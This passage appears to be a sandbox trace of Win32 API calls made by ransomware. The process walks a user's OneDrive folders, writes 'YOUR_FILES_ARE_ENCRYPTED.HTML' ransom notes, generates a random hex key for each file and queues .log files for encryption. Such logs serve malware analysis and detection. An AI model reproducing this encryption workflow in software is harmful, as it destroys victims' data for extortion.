ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad487670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad487670, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="zu-za", cAlternateFileName="")) returned 1 [0163.288] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za") returned 77 [0163.288] GetProcessHeap () returned 0x270000 [0163.288] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0163.288] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za" [0163.288] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za\\*" [0163.288] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xad356b70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad487670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad487670, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0163.288] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xad356b70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad487670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad487670, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0163.288] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad487670, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad487670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad4ad7d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x134a8, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0163.289] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za\\FileSync.LocalizedResources.dll.mui") returned 113 [0163.289] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.289] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0163.289] lstrlenW (lpString=".mui") returned 4 [0163.289] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0163.289] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad487670, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad487670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad4ad7d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x134a8, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0163.289] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0163.289] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0163.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zu-za\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\zu-za\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0163.289] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0163.292] CloseHandle (hObject=0x5b0) returned 1 [0163.292] GetProcessHeap () returned 0x270000 [0163.293] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0163.293] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xad356b70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad487670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad487670, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="zu-za", cAlternateFileName="")) returned 0 [0163.293] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0163.293] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0163.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0163.294] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0163.296] CloseHandle (hObject=0x58c) returned 1 [0163.297] GetProcessHeap () returned 0x270000 [0163.297] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0163.297] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad4ad7d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad4ad7d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4627290, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x44aa8, dwReserved0=0x0, dwReserved1=0x60, cFileName="OneDrive.exe", cAlternateFileName="")) returned 1 [0163.298] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe") returned 69 [0163.298] lstrcmpW (lpString1="OneDrive.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.298] PathFindExtensionW (pszPath="OneDrive.exe") returned=".exe" [0163.298] lstrlenW (lpString=".exe") returned 4 [0163.298] PathFindExtensionW (pszPath="OneDrive.exe") returned=".exe" [0163.298] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="setup", cAlternateFileName="")) returned 1 [0163.298] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup") returned 62 [0163.298] GetProcessHeap () returned 0x270000 [0163.298] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0163.298] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup" [0163.298] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\*" [0163.298] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0163.298] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.298] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3cedd50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3cedd50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="logs", cAlternateFileName="")) returned 1 [0163.298] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs") returned 67 [0163.298] GetProcessHeap () returned 0x270000 [0163.299] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0163.299] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs" [0163.299] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\*" [0163.299] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3cedd50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3cedd50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0163.302] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3cedd50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3cedd50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.302] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaf9def90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x1f02, dwReserved0=0x0, dwReserved1=0x60, cFileName="2021-02-23_085814_a24-9b8.log", cAlternateFileName="2021-0~1.LOG")) returned 1 [0163.302] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_a24-9b8.log") returned 97 [0163.302] lstrcmpW (lpString1="2021-02-23_085814_a24-9b8.log", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.302] PathFindExtensionW (pszPath="2021-02-23_085814_a24-9b8.log") returned=".log" [0163.302] lstrlenW (lpString=".log") returned 4 [0163.302] PathFindExtensionW (pszPath="2021-02-23_085814_a24-9b8.log") returned=".log" [0163.302] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0163.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_a24-9b8.log" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\2021-02-23_085814_a24-9b8.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0163.302] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=7938) returned 1 [0163.303] GetProcessHeap () returned 0x270000 [0163.303] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0163.307] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="11") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="D9") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="27") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="A7") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="AB") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="EC") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="85") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="0C") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="48") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="8A") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="A1") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="73") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="00") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="91") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="78") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="77") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="0B") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="7B") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="0D") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="B4") returned 2 [0163.307] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="D4") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="87") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="C7") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="1D") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="92") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="E8") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="B0") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="02") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="E5") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="02") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="A9") returned 2 [0163.308] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="5C") returned 2 [0163.309] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_a24-9b8.log" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_a24-9b8.log") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_a24-9b8.log" [0163.309] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.309] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0163.309] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa395bc50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa395bc50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xae89d010, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x4458, dwReserved0=0x0, dwReserved1=0x60, cFileName="2021-02-23_085814_b38-b30.log", cAlternateFileName="2021-0~2.LOG")) returned 1 [0163.309] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_b38-b30.log") returned 97 [0163.309] lstrcmpW (lpString1="2021-02-23_085814_b38-b30.log", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.309] PathFindExtensionW (pszPath="2021-02-23_085814_b38-b30.log") returned=".log" [0163.309] lstrlenW (lpString=".log") returned 4 [0163.309] PathFindExtensionW (pszPath="2021-02-23_085814_b38-b30.log") returned=".log" [0163.309] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0163.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_b38-b30.log" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\2021-02-23_085814_b38-b30.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0163.311] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=17496) returned 1 [0163.311] GetProcessHeap () returned 0x270000 [0163.312] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0163.329] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="D5") returned 2 [0163.329] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="9C") returned 2 [0163.329] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="54") returned 2 [0163.329] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="C5") returned 2 [0163.329] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="64") returned 2 [0163.329] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="B0") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="A1") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="DF") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="42") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="0F") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="74") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="99") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="25") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="B2") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="ED") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="CF") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="85") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="51") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="A6") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="DF") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="37") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="FD") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="5D") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="FB") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="A0") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="C0") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="32") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="09") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="E5") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="D2") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="40") returned 2 [0163.331] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="4E") returned 2 [0163.331] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_b38-b30.log" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_b38-b30.log") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_b38-b30.log" [0163.331] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.331] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0163.332] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3cedd50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3cedd50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xae850d50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x3b04, dwReserved0=0x0, dwReserved1=0x60, cFileName="2021-02-23_085815_b24-b2c.log", cAlternateFileName="2021-0~3.LOG")) returned 1 [0163.332] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, 